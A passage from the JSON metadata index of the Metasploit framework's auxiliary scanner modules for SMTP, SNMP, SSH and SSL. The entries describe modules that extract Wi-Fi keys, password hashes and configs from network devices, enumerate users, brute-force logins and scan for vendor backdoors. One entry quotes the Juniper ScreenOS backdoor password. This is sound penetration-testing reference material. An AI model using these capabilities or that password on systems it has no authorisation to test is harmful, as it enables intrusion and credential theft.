"CG <cg@carnal0wnage.com>"
],
"description": "SMTP Banner Grabber",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_version.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/aix_version": {
"name": "AIX SNMP Scanner Auxiliary Module",
"full_name": "auxiliary/scanner/snmp/aix_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "AIX SNMP Scanner Auxiliary Module",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/aix_version.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/aix_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/arris_dg950": {
"name": "Arris DG950A Cable Modem Wifi Enumeration",
"full_name": "auxiliary/scanner/snmp/arris_dg950",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percent_X\" Heiland"
],
"description": "This module will extract WEP keys and WPA preshared keys from\n Arris DG950A cable modems.",
"references": [
"CVE-2014-4863",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-09 12:56:00 +0000",
"path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/arris_dg950",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/brocade_enumhash": {
"name": "Brocade Password Hash Enumeration",
"full_name": "auxiliary/scanner/snmp/brocade_enumhash",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"PercentX\" Heiland"
],
"description": "This module extracts password hashes from certain Brocade load\n balancer devices.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/brocade_enumhash",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/cisco_config_tftp": {
"name": "Cisco IOS SNMP Configuration Grabber (TFTP)",
"full_name": "auxiliary/scanner/snmp/cisco_config_tftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>",
"hdm <x@hdm.io>"
],
"description": "This module will download the startup or running configuration\n from a Cisco IOS device using SNMP and TFTP. A read-write SNMP\n community is required. The SNMP community scanner module can\n assist in identifying a read-write community. The target must\n be able to connect back to the Metasploit system and the use of\n NAT will cause the TFTP transfer to fail.",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/cisco_config_tftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/cisco_upload_file": {
"name": "Cisco IOS SNMP File Upload (TFTP)",
"full_name": "auxiliary/scanner/snmp/cisco_upload_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>",
"ct5595"
],
"description": "This module will copy a file to a Cisco IOS device using SNMP and TFTP.\n The action Override_Config will overwrite the running config of the Cisco device.\n A read-write SNMP community is required. The SNMP community scanner module can\n assist in identifying a read-write community. The target must\n be able to connect back to the Metasploit system and the use of\n NAT will cause the TFTP transfer to fail.",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-09 09:01:33 +0000",
"path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/cisco_upload_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/cnpilot_r_snmp_loot": {
"name": "Cambium cnPilot r200/r201 SNMP Enumeration",
"full_name": "auxiliary/scanner/snmp/cnpilot_r_snmp_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen"
],
"description": "Cambium cnPilot r200/r201 devices can be administered using SNMP. The\n device configuration contains IP addresses, keys, passwords, and other sensitive\n information. This module exploits an access control flaw, which allows remotely\n extracting sensitive information such as account passwords, Wi-Fi PSK, and SIP\n credentials via the SNMP read-only (RO) community string.",
"references": [
"CVE-2017-5262",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-18 17:11:47 +0000",
"path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/cnpilot_r_snmp_loot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/epmp1000_snmp_loot": {
"name": "Cambium ePMP 1000 SNMP Enumeration",
"full_name": "auxiliary/scanner/snmp/epmp1000_snmp_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen"
],
"description": "Cambium devices (ePMP, PMP, Force, & others) can be administered using\n SNMP. The device configuration contains IP addresses, keys, and passwords,\n amongst other information. This module uses SNMP to extract Cambium ePMP device\n configuration. On certain software versions, specific device configuration\n values can be accessed using SNMP RO string, even though only SNMP RW string\n should be able to access them, according to MIB documentation. The module also\n triggers full configuration backup, and retrieves the backup url. The\n configuration file can then be downloaded without authentication. The module\n has been tested on Cambium ePMP versions 3.5 & prior.",
"references": [
"URL-https://ipositivesecurity.com/2017/04/07/cambium-snmp-security-vulnerabilities/",
"CVE-2017-7918",
"CVE-2017-7922"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-18 17:03:13 +0000",
"path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/epmp1000_snmp_loot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/netopia_enum": {
"name": "Netopia 3347 Cable Modem Wifi Enumeration",
"full_name": "auxiliary/scanner/snmp/netopia_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"PercentX\" Heiland"
],
"description": "This module extracts WEP keys and WPA preshared keys from\n certain Netopia cable modems.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/netopia_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/sbg6580_enum": {
"name": "ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module",
"full_name": "auxiliary/scanner/snmp/sbg6580_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matthew Kienow <mkienow@inokii.com>"
],
"description": "This module allows SNMP enumeration of the ARRIS / Motorola\n SURFboard SBG6580 Series Wi-Fi Cable Modem Gateway. It retrieves the username\n and password for the device user interface as well as wireless network keys\n and information.\n The default community used is \"public\".",
"references": [
"URL-https://seclists.org/fulldisclosure/2014/May/79",
"URL-http://www.arrisi.com/modems/datasheet/SBG6580/SBG6580_UserGuide.pdf",
"OSVDB-110555"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/sbg6580_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enum": {
"name": "SNMP Enumeration Module",
"full_name": "auxiliary/scanner/snmp/snmp_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module allows enumeration of any devices with SNMP\n protocol support. It supports hardware, software, and network information.\n The default community used is \"public\".",
"references": [
"URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol",
"URL-http://net-snmp.sourceforge.net/docs/man/snmpwalk.html",
"URL-http://www.nothink.org/perl/snmpcheck/"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enum_hp_laserjet": {
"name": "HP LaserJet Printer SNMP Enumeration",
"full_name": "auxiliary/scanner/snmp/snmp_enum_hp_laserjet",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module allows enumeration of files previously printed.\n It provides details such as filename, client, timestamp and username information.\n The default community used is \"public\".",
"references": [
"URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol",
"URL-http://net-snmp.sourceforge.net/docs/man/snmpwalk.html",
"URL-http://www.nothink.org/perl/snmpcheck/",
"URL-http://www.securiteam.com/securitynews/5AP0S2KGVS.html",
"URL-http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enum_hp_laserjet",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enumshares": {
"name": "SNMP Windows SMB Share Enumeration",
"full_name": "auxiliary/scanner/snmp/snmp_enumshares",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enumshares",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enumusers": {
"name": "SNMP Windows Username Enumeration",
"full_name": "auxiliary/scanner/snmp/snmp_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will use LanManager/psProcessUsername OID values to\n enumerate local user accounts on a Windows/Solaris system via SNMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_login": {
"name": "SNMP Community Login Scanner",
"full_name": "auxiliary/scanner/snmp/snmp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module logs in to SNMP devices using common community names.",
"references": [
"CVE-1999-0508"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_set": {
"name": "SNMP Set Module",
"full_name": "auxiliary/scanner/snmp/snmp_set",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module, similar to the snmpset tool, uses the SNMP SET request\n to set information on a network entity. An OID (numeric notation)\n and a value are required. The target device must permit write access.",
"references": [
"URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol",
"URL-http://www.net-snmp.org/docs/man/snmpset.html",
"URL-http://www.oid-info.com/"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_set.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_set",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/ubee_ddw3611": {
"name": "Ubee DDW3611b Cable Modem Wifi Enumeration",
"full_name": "auxiliary/scanner/snmp/ubee_ddw3611",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"PercentX\" Heiland"
],
"description": "This module will extract WEP keys and WPA preshared keys from\n certain Ubee cable modems.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/ubee_ddw3611",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/xerox_workcentre_enumusers": {
"name": "Xerox WorkCentre User Enumeration (SNMP)",
"full_name": "auxiliary/scanner/snmp/xerox_workcentre_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>"
],
"description": "This module enumerates users on Xerox WorkCentre devices present on the network.\n SNMP is used to extract the usernames.",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/xerox_workcentre_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/apache_karaf_command_execution": {
"name": "Apache Karaf Default Credentials Command Execution",
"full_name": "auxiliary/scanner/ssh/apache_karaf_command_execution",
"rank": 300,
"disclosure_date": "2016-02-09",
"type": "auxiliary",
"author": [
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.\n The 'karaf' user has a known default password, which can be used to log in to the\n SSH service and execute operating system commands remotely.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 8101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 06:48:35 +0000",
"path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/apache_karaf_command_execution",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/ssh/cerberus_sftp_enumusers": {
"name": "Cerberus FTP Server SFTP Username Enumeration",
"full_name": "auxiliary/scanner/ssh/cerberus_sftp_enumusers",
"rank": 300,
"disclosure_date": "2014-05-27",
"type": "auxiliary",
"author": [
"Steve Embling",
"Matt Byrne <attackdebris@gmail.com>"
],
"description": "This module uses a dictionary to brute force valid usernames from\n Cerberus FTP server via SFTP. This issue affects all versions of\n the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy\n in the way the SSH service handles failed logins for valid and invalid\n users. This issue was discovered by Steve Embling.",
"references": [
"URL-http://xforce.iss.net/xforce/xfdb/93546",
"BID-67707"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 06:48:35 +0000",
"path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/cerberus_sftp_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/detect_kippo": {
"name": "Kippo SSH Honeypot Detector",
"full_name": "auxiliary/scanner/ssh/detect_kippo",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Andrew Morris <andrew@morris.guru>"
],
"description": "This module will detect if an SSH server is running a Kippo honeypot.\n This is done by issuing unexpected data to the SSH service and checking\n the response returned for two particular non-standard error messages.",
"references": [
"URL-https://www.obscurechannel.com/x42/magicknumber.html",
"URL-http://morris.guru/detecting-kippo-ssh-honeypots/"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-26 15:43:10 +0000",
"path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/detect_kippo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/eaton_xpert_backdoor": {
"name": "Eaton Xpert Meter SSH Private Key Exposure Scanner",
"full_name": "auxiliary/scanner/ssh/eaton_xpert_backdoor",
"rank": 300,
"disclosure_date": "2018-07-18",
"type": "auxiliary",
"author": [
"BrianWGray"
],
"description": "Eaton Power Xpert Meters running firmware below version 12.x.x.x or\n below version 13.3.x.x ship with a public/private key pair that\n facilitates remote administrative access to the devices.\n Tested on: Firmware 12.1.9.1 and 13.3.2.10.",
"references": [
"CVE-2018-16158",
"EDB-45283",
"URL-http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf",
"URL-https://www.ctrlu.net/vuln/0006.html"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 15:47:18 +0000",
"path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/eaton_xpert_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/fortinet_backdoor": {
"name": "Fortinet SSH Backdoor Scanner",
"full_name": "auxiliary/scanner/ssh/fortinet_backdoor",
"rank": 300,
"disclosure_date": "2016-01-09",
"type": "auxiliary",
"author": [
"operator8203 <operator8203@runbox.com>",
"wvu <wvu@metasploit.com>"
],
"description": "This module scans for the Fortinet SSH backdoor.",
"references": [
"CVE-2016-1909",
"EDB-39224",
"PACKETSTORM-135225",
"URL-https://seclists.org/fulldisclosure/2016/Jan/26",
"URL-https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 15:36:32 +0000",
"path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/fortinet_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/juniper_backdoor": {
"name": "Juniper SSH Backdoor Scanner",
"full_name": "auxiliary/scanner/ssh/juniper_backdoor",
"rank": 300,
"disclosure_date": "2015-12-20",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"h00die <mike@stcyrsecurity.com>"
],
"description": "This module scans for the Juniper SSH backdoor (also valid on Telnet).\n Any username is accepted, and the password is <<< %s(un='%s') = %u.",
"references": [
"CVE-2015-7755",
"URL-https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
"URL-https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 06:48:35 +0000",
"path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/juniper_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/karaf_login": {
"name": "Apache Karaf Login Utility",
"full_name": "auxiliary/scanner/ssh/karaf_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Samuel Huckins",
"Brent Cook",
"Peer Aagaard",
"Greg Mikeska",
"Dev Mohanty"
],
"description": "This module attempts to log into Apache Karaf's SSH service. If the TRYDEFAULTCRED option is\n set, it will also try the default 'karaf' credential.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 15:47:18 +0000",
"path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/karaf_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/libssh_auth_bypass": {
"name": "libssh Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/ssh/libssh_auth_bypass",
"rank": 300,
"disclosure_date": "2018-10-16",
"type": "auxiliary",
"author": [
"Peter Winter-Smith",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an authentication bypass in libssh server code\n where a USERAUTH_SUCCESS message is sent in place of the expected\n USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and\n 0.8.0 through 0.8.3 are vulnerable.\n\n Note that this module's success depends on whether the server code\n can trigger the correct (shell/exec) callbacks despite only the state\n machine's authenticated state being set.\n\n Therefore, you may or may not get a shell if the server requires\n additional code paths to be followed.",
"references": [
"CVE-2018-10933",
"URL-https://www.libssh.org/security/advisories/CVE-2018-10933.txt"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 17:21:11 +0000",
"path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/libssh_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_enumusers": {
"name": "SSH Username Enumeration",
"full_name": "auxiliary/scanner/ssh/ssh_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kenkeiras",
"Dariusz Tytko",
"Michal Sajdak",
"Qualys",
"wvu <wvu@metasploit.com>"
],
"description": "This module uses a malformed packet or timing attack to enumerate users on\n an OpenSSH server.\n\n The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST\n packet using public key authentication (must be enabled) to enumerate users.\n\n On some versions of OpenSSH under some configurations, OpenSSH will return a\n \"permission denied\" error for an invalid user faster than for a valid user,\n creating an opportunity for a timing attack to enumerate users.\n\n Testing note: invalid users were logged, while valid users were not. YMMV.",
"references": [
"CVE-2003-0190",
"CVE-2006-5229",
"CVE-2016-6210",
"CVE-2018-15473",
"OSVDB-32721",
"BID-20418",
"URL-https://seclists.org/oss-sec/2018/q3/124",
"URL-https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_identify_pubkeys": {
"name": "SSH Public Key Acceptance Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_identify_pubkeys",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>",
"hdm <x@hdm.io>",
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module can determine what public keys are configured for\n key-based authentication across a range of machines, users, and\n sets of known keys. The SSH protocol indicates whether a particular\n key is accepted prior to the client performing the actual signed\n authentication request. To use this module, a text file containing\n one or more SSH keys should be provided. These can be private or\n public, so long as no passphrase is set on the private keys.\n\n If you have loaded a database plugin and connected to a database\n this module will record authorized public keys and hosts so you can\n track your process.\n\n Key files may be a single public (unencrypted) key, or several public\n keys concatenated together as an ASCII text file. Non-key data should be\n silently ignored. Private keys will only utilize the public key component\n stored within the key file.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 14:59:52 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_identify_pubkeys",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_login": {
"name": "SSH Login Check Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will test ssh logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:38:58 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_login_pubkey": {
"name": "SSH Public Key Login Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_login_pubkey",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>",
"RageLtMan"
],
"description": "This module will test ssh logins on a range of machines using\n a defined private key file, and report successful logins.\n If you have loaded a database plugin and connected to a database\n this module will record successful logins and hosts so you can\n track your access.\n\n Key files may be a single private key, or several private keys in a single\n directory. Only a single passphrase is supported however, so it must either\n be shared between subject keys or only belong to a single one.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_login_pubkey",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_version": {
"name": "SSH Version Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Daniel van Eeden <metasploit@myname.nl>"
],
"description": "Detect SSH Version.",
"references": [
"URL-http://en.wikipedia.org/wiki/SecureShell"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_version.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssl/bleichenbacher_oracle": {
"name": "Scanner for Bleichenbacher Oracle in RSA PKCS #1 v1.5",
"full_name": "auxiliary/scanner/ssl/bleichenbacher_oracle",
"rank": 300,
"disclosure_date": "2009-06-17",
"type": "auxiliary",
"author": [
"Hanno Böck",
"Juraj Somorovsky",
"Craig Young",
"Daniel Bleichenbacher",
"Adam Cammack <adam_cammack[AT]rapid7.com>"
],
